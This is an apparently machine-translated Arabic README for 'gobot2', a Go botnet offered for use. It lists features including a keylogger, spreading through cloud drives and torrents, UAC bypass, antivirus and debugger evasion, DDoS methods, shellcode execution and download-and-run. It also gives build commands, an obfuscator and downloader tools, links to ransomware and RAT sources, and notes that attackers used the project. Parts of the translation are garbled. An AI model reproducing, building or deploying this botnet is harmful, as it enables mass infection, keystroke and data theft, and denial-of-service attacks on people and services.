مشروع جديد: https://github.com/saturnsvoid/project-whis
gobot2
بعد رؤية مستخدمين آخرين يذهبون إلى الروبوتات ، أردت القيام بالمزيد من العمل على gobot الخاص بي ، لكنني انتهى بي الأمر إلى بناء شيء أكثر قليلاً. هناك مشكلات مع هذا ولكنها أكثر من POC متقدم .... أنا لست مؤلفًا جيدًا ، لكنني تمكنت من جعل هذا الشراء يقوم ببعض القراءة الأساسية عبر الإنترنت. كان هناك الكثير الذي أردت القيام به مع هذا المشروع ، لكنني توقفت ، وأنا أخرج من صنع البرامج الضارة والفيروسات ... سأنتقل إلى المزيد من الأشياء الشرعية. على الرغم من أنني سأقوم بنشر بعض مشاريعي القديمة على جيثب ، ومعظم الساحرة خبيثة ، فأنا أضعهم هنا لجعل الأمر أكثر بساطة على "الطيبون" لمحاربتهم وهناك الأقرباء.
ميزات C&C:
- مكتوبة في الذهاب
- منصة العرض
- قاعدة بيانات SQL للمعلومات
- نظام تسجيل الدخول الآمن
- نظام تسجيل الدخول المرحم
- سهل الاستخدام HTML & CSS C & C
- وحدة التحكم C&C
- أمن مشدود (لا PHP!)
- بيانات مشفرة ومثبتة
- HTTPS أو HTTP
- واحد ، محدد ، كل الأوامر إصدار
- الكشف عن وكيل المستخدم
- أكثر
ميزات الروبوت
- معالجة الأخطاء الآمنة
- لديها لوحات غير محدودة
- الترميز والتشويش
- استخدم HTTPS أو HTTP
- Old (> 24 ساعة) معالجة الأوامر (لا تدير أوامر قديمة!)
- تشغيل البرامج النصية PowerShell (عبر عنوان URL ، معلمات مقبولة)
- سيل سيل متقدم (uTorrent ، bitTorrent Auto قم بتنزيل العميل ويتم تشغيله مخفيًا إذا لزم الأمر)
- Drive Spreader (مع قائمة الأسماء)
- Dropbox Spreader (مع قائمة الأسماء)
- Google Drive Spreader (مع قائمة الأسماء)
- OneDrive Spreader (مع قائمة الأسماء)
- Keylogger المتقدم (يتعامل مع جميع المفاتيح ، وعناوين النوافذ ، والحافظة ، و autostart ، +المزيد)
- معلومات النظام (IP ، WiFi ، المستخدم ، AV ، IpConfig ، وحدة المعالجة المركزية ، GPU ، Sysinfo ، برنامج مثبت ، إطار عمل .NET ، تنشيط)
- التقاط الشاشة (ضغط ، التقاط توقيت ، +المزيد)
- قم بتنزيل وتشغيل (فحص تجزئة MD5 ، URL أو BASE64 ، المعلمات ، UAC BYPASS ، REANDER)
- طرق DDOs (الفاصل الزمني الخيوط /W ، httpget ، tcpflood ، udpflood ، slowloris ، hulk ، tlsflood ، drainsth عرض النطاق الترددي ، goldeneye ، ace)
- تحديث BOT (فحص تجزئة MD5 ، المسؤول ، مزيل المنطقة)
- UPNP (منافذ TCP/UDP مفتوحة)
- خادم الويب (منفذ Auto-Upnp 80 ، إضافة/تحرير صفحات غير محدودة)
- أضف برامج إلى جدار حماية Windows
- محرر الملف المضيف (النسخ الاحتياطي واستعادة ، استبدال عند التشغيل ، DNS Flusher)
- CMD البعيد
- اكتشاف حقوق المسؤول
- جيل معرف الروبوت (أبدا نفسه)
- الالتفافية المضادة للفيروسات المتقدمة (تخصيص الذاكرة العشوائية ، Func Hop ، التأخير ، تحميل وقت التشغيل DLLS /W OBF ، أوقات اتصال عشوائية ، + المزيد)
- مكافحة Debug المتقدمة (ISDebuggerPresent ، اكتشاف PROC ، اكتشاف مؤسسة IP ، اكتشاف اسم الملف ، نظام التفاعل)
- نظام مثيل واحد
- عكس وكيل HTTP (Conf. Port ، خوادم الخلفية)
- الدفاع النشط (الدفاع النشط للسجل ، الدفاع عن الملف النشط ، وصلتس الرقابة النشط + المزيد) لا يريد قتل.
- UAC Bypass (اعمل جميع الإصدارات والإصدار الحالي من Windows 10 Pro 64bit)
- نظام التثبيت المتقدم (مفاتيح التسجيل الديناميكي ، أسماء الملفات الديناميكية ، الاحتفاظ بحقوق المشرف ، استهداف الحملة (التثبيت فقط في البلد المسموح به) ، يضيف منطقة الإزاحة إلى جدار الحماية)
- نظام إلغاء التثبيت (يزيل جميع الآثار)
- Scripter (دفعة ، HTML ، VBS ، PS)
- تشغيل shellcode (threadexecute)
- خيارات الطاقة (الإغلاق ، إعادة التشغيل ، تسجيل الدخول)
- رسالة خطأ بدء التشغيل
- MessageBox (إرجاع الرد)
- موقع مفتوح (مرئي/مخفي)
- تغيير الصفحة الرئيسية
- تغيير الخلفية (url أو base64)
- Run .exe (UAC Bypass Optimal)
- اقتل الذات
- تحقق مما إذا كان Proc قيد التشغيل
- إخفاء العملية /W الوضع النشط
- تعطيل/تمكين (TaskManger ، Rededit ، موجه الأوامر)
- قطرات الملف (مكان evedence على جهاز الكمبيوتر بدون آثار حيث جاء من /W Dir Selection)
بعض المعلومات حول C&C
C&C هو برنامج ، يمكنك تجميعه لأنظمة Windows و Linux و Mac. إنه خادم ويب يدير نفسه يتولى جميع الاتصالات على المنفذ المحدد في الإعدادات. سوف يخدم HTLM C&C إلى موصل إذا سمحت به وحفظ البيانات حول الحساب والروبوتات والأوامر كقاعدة بيانات SQL وملفات BOTS (لقطات الشاشة ، KEYLOGS ، ECT) كملف تحت برامج BOTS الخاصة "ملف تعريف" الخاص ".
يمكنك التحكم في الروبوتات من البرنامج (أكثر أمانًا) أو التحكم فيه من HTML C&C. برنامج C&C مستقر للغاية ، والخوادم المستندة إلى Go تعرف على التعامل مع الملايين أو الطلبات في وقت واحد دون فشل ، فقط تأكد من أن لديك اتصال جيد.
يحتوي C&C على تصميم في تسجيل دخول شديد الترميز (كيندا مثل الباب الخلفي) يمكنك استخدامه إذا نسيت تسجيل الدخول إلى الحساب. يمكن أن يكون لدى C&C أي عدد من الحسابات.
مع كونه برنامجًا قائمة بذاته ، يزيل هذا مسألة هجمات SQLI على C&C بحيث يكون أكثر أمانًا.
يمكن أن تعمل C&C أيضًا داخل خدمة Tor Hidden إذا تم تكوينها بشكل صحيح ويمكن للعميل (BOT) الاتصال به باستخدام Property.to Or Onion.cab إذا لزم الأمر. يمكن أيضًا استخدام TOR بواسطة BOT عبر وكيل Socks ... بسيط للقيام به ، Google IT.
كيفية البناء والاستخدام
توجد إعدادات الروبوت في إعداد خادم "ariables.go" في "server.go"
compile gobot.go مع الإعدادات الصحيحة ، وقم بإنشاء قاعدة بيانات MySQL واستيراد ملف DB ، و compile server.go مع الإعدادات الصحيحة
- go build -o gobot.exe -ldflags "-h windowsgui" "c: gobot2 gobot.go"
- انتقل إلى build -0 server.exe "c: gobot2 console server server.go"
قم دائمًا بالترجمة مع "-W -S 'ldflags لتجريد أي معلومات تصحيح من الثنائي.
أدوات متضمنة
- أداة للمشروع (obfuscator (char+1) وغيرها من حماقة. w/ source في vb.net)
- Downloader.go (تنزيل Golang وتشغيل مثال)
- DownloaderWithuac.go (تنزيل Golang وتشغيله مع UAC Bypass)
المحب
إنه ليس حقًا محبطًا ، كل ما يفعله يحرك char +1 إلى A و A = B ، C = D ، ECT. بسيط ولكنه سيؤدي إلى إبطاء الأشخاص الذين يريدون العبث بالبرنامج وأيضًا البرامج التي تبحث عن الكلمات الرئيسية ...
الحزم المستخدمة
- github.com/nebuterlabs/goupnp
- golang.org/x/sys/windows/registry
- github.com/allendang/w32
- github.com/atotto/clipboard
- github.com/stackexchange/wmi
الصور
- http://prnt.sc/d67nh5
- http://prnt.sc/d67ogh
- http://prnt.sc/d67oqh
- http://prnt.sc/d6esj3
الاعتمادات والأشياء
- https://github.com/decred/gominer
- https://github.com/robvanmieghem/gominer
- https://astaxie.gitbooks.io/build-web-application-with-golang/content/en/04.5.html
- http://www.adlice.com/runpe-hide-code-behind-legit-process/
- http://www.hacking-tutorial.com/tips-and-trick/how-to-enable-remote-desktop-using-command-prom/
- https://enigma0x3.net/2016/08/15/filless-uac-bypass-use-eventvwr-exe-ing-registry/
- https://mholt.github.io/json-to-go/
- https://sentinelone.com/blogs/anti-vm-tricks/
- http://hackforums.net/showthread.php؟tid=5383448
- https://github.com/grafov/hulk
- https://github.com/nhooyr/dos
- https://github.com/marcelki/SockStress
- https://github.com/ammario/ssynflood
- https://github.com/matishsiao/goinfo/blob/master/goinfo_windows.go
- https://github.com/iamacarpet/go-win64api
- https://github.com/oneumyvakin/initme/blob/master/windows.go
- https://github.com/lolsquad/ddos-scripts
- https://github.com/vbooter/ddos-scripts
- https://github.com/natefinch/pie
- https://www.windows-commandline.com/enable-remote-desktop-command-line/
- https://www.socketloop.com/tutorials/golang-secure-tls-connection-between-server-and-client
- https://github.com/lextoumbourou/goodhosts
- https://github.com/yinandyangsecurityawareness/dreamr-botnet
- https://github.com/mauri870/ransomware
- http://www.devdungeon.com/content/making-tor-http-requests-go
- http://www.darul.io/post/2015-07-22_go-lang-simple-reverse-proxy
- https://github.com/mauri870/powershell-reverse-http
- https://github.com/gh0std4ncer/lizkebab/blob/master/client.c
- https://github.com/egebalci/egesploit
- https://github.com/egebalci/Hercules
- https://github.com/andrewaeva/gobotnet
- https://github.com/saturnsvoid/gobot
- https://github.com/petercunha/goat
- https://github.com/huin/goupnp
- https://github.com/ytisf/thezoo/tree/master/malwares/source/original
- https://github.com/malwares/remote-access-trojan
- https://github.com/kardianos/service
- https://github.com/vova616/screenshot/blob/master/screenshot_windows.go
- http://hackforums.net/showthread.php؟tid=5040543
- http://www.calhoun.io/5-teful-ways-to-use-closures-in-go/
- https://blogs.technet.microsoft.com/ilikesql_by_dandyman/2013/03/10/how-to-install-a-msi-file-unattender/
- https://github.com/tadzik/simpleaes
- https://guitmz.com/win32-liora-b/
- https://github.com/rk/go-cron
- https://breakingmalware.com/vulnerabilities/elastic-boundaries-elevating-privileges-by-environment-variables-expansion/
- https://breakingmalware.com/malware/ardbot-a-malware-under-construction/
- https://breakingmalware.com/malware/furtim-malware-avoids-mass-infection/
- https://www.pugetsystems.com/labs/support-software/how-to-disable-sleep-mode-or-hibernation-793/
- https://files.sans.org/summit/digital_forensics_and_incident_response_summit_2015/pdfs/theressomethingaboutwmidevonkerr.pdf
- https://github.com/jasonlvhit/gocron
آخر
GO هي لغة برمجة مذهلة وقوية. إذا لم تقم بالفعل ، تحقق من ذلك ؛ https://golang.org/
التبرعات
يرجى التبرع بعنوان Bitcoin: 1aebr1utjayu3sgtbkzcljmrr5rs7bp7ee
أخبار
لقد قرأت للتو مقالًا عن كمبيوتر bleeping ، https://www.bleepingcomputer.com/news/security/backdoored-torrents-infect-govie-tv-fans-fans-with-gobot2-malware/ يبدو أن شخصًا ما قد وجد استخدامًا لهذا المشروع ... ليس لدي أي مشاركة مع هذه المجموعة أو الشخص. ليس لدي ما أقوله في هذا الشأن.
السلطعون
---------- تحديث سجل -------------------
03/15/2017: التحميل العميد ...